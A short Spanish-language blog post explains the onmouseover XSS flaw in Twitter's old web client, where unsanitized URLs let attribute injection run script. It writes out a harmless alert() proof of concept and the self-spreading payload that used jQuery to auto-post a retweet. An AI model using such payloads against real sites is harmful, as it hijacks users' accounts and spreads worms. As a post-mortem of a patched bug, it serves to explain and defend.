Esta semana Twitter sufrió un ataque XSS que afectó su cliente de web (no el #newtwitter). Como nos explican en su blog este problema ya fue parcheado el anterior mes pero al realizar una actualización a Twitter resurgió.

Basicamente el problema fue que el cliente de  Twitter no limpiaba el código que venía con las URLs. Cuando uno coloca un link (LINK) en un tweet el cliente de Twitter le da el siguiente formato:

<a href="LINK" class="tweet-url" rel="nofollow" target="_blank">LINK</a>

Pero digamos que envíamos esta URL vía Twitter

http://a.com"onmouseover="alert('Weee!')

Twitter colocará la url tal cual en el parámetro href:

<a href="http://a.com"onmouseover="alert('Weee!')"> http://a.com"onmouseover="alert('Weee!')</a>

Los browsers reconoceran el link como:

<a href="http://a.com" onmouseover="alert('Weee!')"> http://a.com"onmouseover="alert('Weee!')</a>

Obviamente con el control de onmouseover y Twitter utiliza jQuery, se pueden imaginar que cosas hicieron con:

http://t.co/@"onmouseover="document.getElementById('status').value='RT Matsta';$('.status-update-form').submit();"class="modal-overlay"/